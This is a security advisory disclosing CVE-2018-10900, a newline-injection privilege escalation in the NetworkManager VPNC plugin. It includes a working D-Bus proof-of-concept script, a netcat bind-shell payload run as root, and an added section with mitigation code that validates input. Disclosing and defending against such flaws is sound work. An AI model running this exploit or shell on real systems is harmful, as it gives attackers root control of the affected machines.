Network Manager VPNC 1.2.4 Privilege Escalation Vulnerability
Network Manager VPNC - Privilege Escalation (CVE-2018-10900)

Release URL: https://pulsesecurity.co.nz/advisories/NM-VPNC-Privesc
CVE: CVE-2018-10900
Author: Denis Andzakovic
Source: https://gitlab.gnome.org/GNOME/NetworkManager-vpnc
Affected Software: Network Manager VPNC <= 1.2.4

--[ Description

The Network Manager VPNC plugin is vulnerable to a privilege escalation attack. A newline character can be used to inject a Password helper parameter into the configuration data passed to VPNC, allowing an attacker to execute arbitrary commands as root.

--[ Privilege Escalation

When initiating a VPNC connection, Network Manager spawns a new vpnc process and passes the configuration via STDIN. By injecting a \n character into a configuration parameter, an attacker can coerce Network Manager to set the Password helper option to an attacker-controlled executable file.

The following Python script generates a VPNC connection which will execute the /tmp/test file when connected. The newline character is injected into the Xauth username parameter.

```python
import dbus

# Connection settings as accepted by NetworkManager's Settings.AddConnection.
con = {
    'vpn': {
        'service-type': 'org.freedesktop.NetworkManager.vpnc',
        'data': {
            'IKE DH Group': 'dh2',
            'IPSec ID': 'testgroup',
            'IPSec gateway': 'gateway',
            'IPSec secret-flags': '4',
            'Local Port': '0',
            'NAT Traversal Mode': 'natt',
            'Perfect Forward Secrecy': 'server',
            'Vendor': 'cisco',
            'Xauth password-flags': '4',
            # The embedded newline terminates the "Xauth username" line and
            # starts a new "Password helper" line in the config fed to vpnc.
            'Xauth username': "username\nPassword helper /tmp/test",
            'ipsec-secret-type': 'unused',
            'xauth-password-type': 'unused',
        },
    },
    'connection': {
        'type': 'vpn',
        'id': 'vpnc_test',
    },
    'ipv4': {'method': 'auto'},
    'ipv6': {'method': 'auto'},
}

# Add the connection over the system bus; NetworkManager persists it.
bus = dbus.SystemBus()
proxy = bus.get_object("org.freedesktop.NetworkManager",
                       "/org/freedesktop/NetworkManager/Settings")
settings = dbus.Interface(proxy, "org.freedesktop.NetworkManager.Settings")
settings.AddConnection(con)
```

The above results in the following configuration being passed to the vpnc process when the connection is initialized:

```
Debug 0
Script /usr/local/libexec/nm-vpnc-service-vpnc-helper 0 3950 --bus-name org.freedesktop.NetworkManager.vpnc.Connection_4
Cisco UDP Encapsulation Port 0
Local Port 0
IKE DH Group dh2
Perfect Forward Secrecy server
Xauth username username
Password helper /tmp/test
IPSec gateway gateway
IPSec ID testgroup
Vendor cisco
NAT Traversal Mode natt
```

The following figure details the complete privilege escalation attack.

```
doi@ubuntu:~$ cat << EOF > /tmp/test
> #!/bin/bash
> mkfifo pipe
> nc -k -l -p 8080 < pipe | /bin/bash > pipe
> EOF
doi@ubuntu:~$ python vpnc_privesc.py
doi@ubuntu:~$ nmcli connection
NAME                UUID                                  TYPE      DEVICE
Wired connection 1  a8b178fd-8cbc-3e15-aa9e-d52982215d98  ethernet  ens3
vpnc_test           233101cb-f786-44ed-9e4f-662f1a519429  vpn       ens3
doi@ubuntu:~$ nmcli connection up vpnc_test
^Z
[1]+  Stopped                 nmcli connection up vpnc_test
doi@ubuntu:~$ nc -vv 127.0.0.1 8080
Connection to 127.0.0.1 8080 port [tcp/http-alt] succeeded!
id
uid=0(root) gid=0(root) groups=0(root)
```

--[ Timeline

11/07/2018 - Advisory sent to security@gnome.org
13/07/2018 - Acknowledgement from Gnome security
20/07/2018 - CVE-2018-10900 assigned, patch scheduled for the following day
21/07/2018 - Network Manager VPNC 1.2.6 released
21/07/2018 - Advisory released

--[ About Pulse Security

Pulse Security is a specialist offensive security consultancy dedicated to providing best in breed security testing and review services.

W: https://pulsesecurity.co.nz
E: info at pulsesecurity.co.nz
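The injection in the Privilege Escalation section works because the connection data is flattened into one "Option value" line per entry with no check for line breaks, so a value containing "\n" becomes a second, attacker-chosen option. The block below is an added example, not code from the advisory or from NetworkManager-vpnc: it models that flattening with a small assumed subset of option names, shows how a line-oriented reader ends up seeing a Password helper option that was never a key, and gives the validation check of the kind that closes the hole, rejecting any key or value that carries a control character before it reaches the serializer.

```python
import re

# Constructed sample mirroring the advisory's injected 'Xauth username' value;
# only the keys needed for the demonstration are included.
INJECTED_DATA = {
    'IPSec gateway': 'gateway',
    'IPSec ID': 'testgroup',
    'Xauth username': 'username\nPassword helper /tmp/test',
}
CLEAN_DATA = dict(INJECTED_DATA, **{'Xauth username': 'username'})

# Option names a line-oriented reader recognises (assumed subset, not vpnc's list).
KNOWN_OPTIONS = ('IPSec gateway', 'IPSec ID', 'Xauth username', 'Password helper')

# Newline, carriage return, NUL and the other C0 controls, plus DEL.
CONTROL_CHARS = re.compile(r'[\x00-\x1f\x7f]')


def serialize_vpnc_config(data):
    """Render connection data as the 'Option value' lines vpnc reads on STDIN.
    Deliberately performs no validation, like the vulnerable code path."""
    return ''.join(f'{key} {value}\n' for key, value in data.items())


def effective_options(config_text):
    """Parse the text back as a line-oriented reader would: each line is matched
    against the known option names, longest name first. Returns {option: value}."""
    options = {}
    for line in config_text.splitlines():
        for name in sorted(KNOWN_OPTIONS, key=len, reverse=True):
            if line.startswith(name + ' '):
                options[name] = line[len(name) + 1:]
                break
    return options


def find_unsafe_entries(data):
    """Mitigation: refuse any key or value containing a control character so a
    single entry can never expand into several config lines.
    Returns a list of (key, reason); an empty list means the data is clean."""
    problems = []
    for key, value in data.items():
        if CONTROL_CHARS.search(key):
            problems.append((key, 'control character in key'))
        if CONTROL_CHARS.search(str(value)):
            problems.append((key, 'control character in value'))
    return problems
```

Running `effective_options(serialize_vpnc_config(INJECTED_DATA))` yields a `Password helper` entry although no such key was supplied, while `find_unsafe_entries(INJECTED_DATA)` flags the `Xauth username` entry and `find_unsafe_entries(CLEAN_DATA)` returns an empty list.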